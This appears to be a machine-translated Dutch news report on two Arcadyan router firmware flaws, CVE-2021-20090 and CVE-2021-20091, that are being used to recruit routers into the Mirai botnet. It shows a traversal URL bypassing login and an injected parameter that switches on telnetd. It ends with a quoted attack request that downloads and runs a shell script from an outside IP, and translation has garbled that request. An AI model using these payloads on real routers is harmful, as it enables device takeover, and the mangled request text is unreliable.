Er is een enorme aanval op het netwerk geregistreerd tegen thuisrouters waarvan de firmware gebruikmaakt van een HTTP-serverimplementatie van het bedrijf Arcadyan. Om controle over apparaten te krijgen wordt gebruik gemaakt van een combinatie van twee kwetsbaarheden die het op afstand uitvoeren van willekeurige code met rootrechten mogelijk maakt. Het probleem treft een vrij groot aantal ADSL-routers van Arcadyan, ASUS en Buffalo, evenals apparaten geleverd onder de merken Beeline (het probleem wordt bevestigd in Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone en andere telecomoperatoren. Opgemerkt wordt dat het probleem al meer dan 10 jaar aanwezig is in Arcadyan-firmware en gedurende deze tijd erin is geslaagd te migreren naar ten minste 20 apparaatmodellen van 17 verschillende fabrikanten.
De eerste kwetsbaarheid, CVE-2021-20090, maakt het mogelijk om zonder authenticatie toegang te krijgen tot elk webinterfacescript. De essentie van de kwetsbaarheid is dat in de webinterface sommige mappen waarlangs afbeeldingen, CSS-bestanden en JavaScript-scripts worden verzonden, zonder authenticatie toegankelijk zijn. In dit geval worden mappen waarvoor toegang zonder authenticatie is toegestaan, gecontroleerd met behulp van het initiële masker. Het opgeven van “../”-tekens in paden om naar de bovenliggende map te gaan, wordt door de firmware geblokkeerd, maar het gebruik van de combinatie “..%2f” wordt overgeslagen. Het is dus mogelijk om beveiligde pagina's te openen bij het verzenden van verzoeken zoals “http://192.168.1.1/images/..%2findex.htm”.
De tweede kwetsbaarheid, CVE-2021-20091, stelt een geauthenticeerde gebruiker in staat wijzigingen aan te brengen in de systeeminstellingen van het apparaat door speciaal opgemaakte parameters naar het script apply_abstract.cgi te sturen, dat niet controleert op de aanwezigheid van een newline-teken in de parameters. . Bij het uitvoeren van een ping-bewerking kan een aanvaller bijvoorbeeld de waarde “192.168.1.2%0AARC_SYS_TelnetdEnable=1” opgeven in het veld waarin het IP-adres wordt gecontroleerd, en het script, bij het maken van het instellingenbestand /tmp/etc/config/ .glbcfg, zal de regel “AARC_SYS_TelnetdEnable=1” erin schrijven ", waardoor de telnetd-server wordt geactiveerd, die onbeperkte toegang tot de opdrachtshell biedt met rootrechten. Op dezelfde manier kunt u, door de parameter AARC_SYS in te stellen, elke code op het systeem uitvoeren. De eerste kwetsbaarheid maakt het mogelijk om een problematisch script uit te voeren zonder authenticatie door het te openen als “/images/..%2fapply_abstract.cgi”.
Om kwetsbaarheden te kunnen misbruiken moet een aanvaller een verzoek kunnen sturen naar de netwerkpoort waarop de webinterface draait. Afgaande op de dynamiek van de verspreiding van de aanval laten veel operators toegang op hun apparaten vanaf het externe netwerk achter om de diagnose van problemen door de ondersteunende dienst te vereenvoudigen. Als de toegang tot de interface alleen beperkt is tot het interne netwerk, kan een aanval worden uitgevoerd vanaf een extern netwerk met behulp van de “DNS-rebinding”-techniek. Kwetsbaarheden worden al actief gebruikt om routers met het Mirai-botnet te verbinden: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Verbinding: close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; krul+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
Bron: opennet.ru